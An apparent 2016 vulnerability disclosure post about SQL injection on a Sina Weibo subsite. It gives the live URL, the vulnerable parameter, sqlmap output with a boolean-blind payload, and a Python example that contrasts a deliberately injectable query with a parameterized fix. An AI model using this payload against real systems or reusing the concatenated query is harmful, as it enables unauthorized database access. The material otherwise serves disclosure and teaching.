IT Technology Interactive Exchange Platform

A Sina Weibo subsite has a SQL injection vulnerability

Author: Anonymous  Published: 2016-03-03 21:27:16

A Sina Weibo subsite is vulnerable to SQL injection.

URL: http://xueyuan.weibo.com/course/index?categoryid=&orderby_fild=3&orderby_operate=desc&key_word=&current_type=0  Parameter: key_word
GET parameter 'key_word' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 9 HTTP(s) requests:
---
Place: GET
Parameter: key_word
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoryid=&orderby_fild=3&orderby_operate=desc&key_word=%'and(1=1 AND 2283=2283)and'%'='&current_type=0
---
[10:25:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:25:40] [INFO] testing MySQL
[10:25:44] [INFO] confirming MySQL
[10:25:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

Remediation:
Filter the key_word input.
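The payload sqlmap recorded (`%'and(1=1 AND 2283=2283)and'%'='`) closes a `LIKE '%...%'` string literal, appends a true or false condition, and reopens the literal; the "boolean-based blind" label means the attacker learns one bit per request from whether the page content changes. The following Python example is added here to show that bug class next to the fix; it is not code from the original report or from the Weibo site, the course table and its schema are constructed, and the `LIKE '%...%'` query shape is an assumption inferred from the payload.

```python
import sqlite3

# The sqlmap payload recorded on the page (URL-decoded), and the boolean-false
# counterpart a blind test compares it against.
TRUE_PAYLOAD = "%'and(1=1 AND 2283=2283)and'%'='"
FALSE_PAYLOAD = "%'and(1=2 AND 2283=2283)and'%'='"


def build_db():
    """Constructed in-memory course catalogue standing in for the table the
    endpoint searches; the schema is hypothetical, not the real site's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO course (title) VALUES (?)",
        [("Intro to Python",), ("Advanced SQL",), ("Web Security",)],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, key_word):
    """Builds the statement by string concatenation, the shape the recorded
    payload implies: user text is spliced into a LIKE '%...%' literal."""
    sql = "SELECT id FROM course WHERE title LIKE '%" + key_word + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, key_word):
    """Binds the search term as a parameter. The wildcards are added in
    Python, so the value can never alter the statement's structure."""
    sql = "SELECT id FROM course WHERE title LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + key_word + "%",))]


def blind_oracle_differs(search, conn):
    """True when the true/false payloads yield different result sets, i.e. the
    endpoint exposes a boolean oracle. Usable as a regression check on a fix."""
    return search(conn, TRUE_PAYLOAD) != search(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    print("concatenated query leaks oracle:", blind_oracle_differs(search_vulnerable, db))
    print("parameterized query leaks oracle:", blind_oracle_differs(search_safe, db))
```

With the concatenated query the true payload matches every row and the false payload matches none, which is exactly the difference a blind test keys on; with the bound parameter both payloads are searched for as literal text and return nothing. Filtering alone is fragile because it must anticipate every quoting trick; binding the parameter removes the problem at its root, and the `blind_oracle_differs` check can be kept as a test that the fix stays in place.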
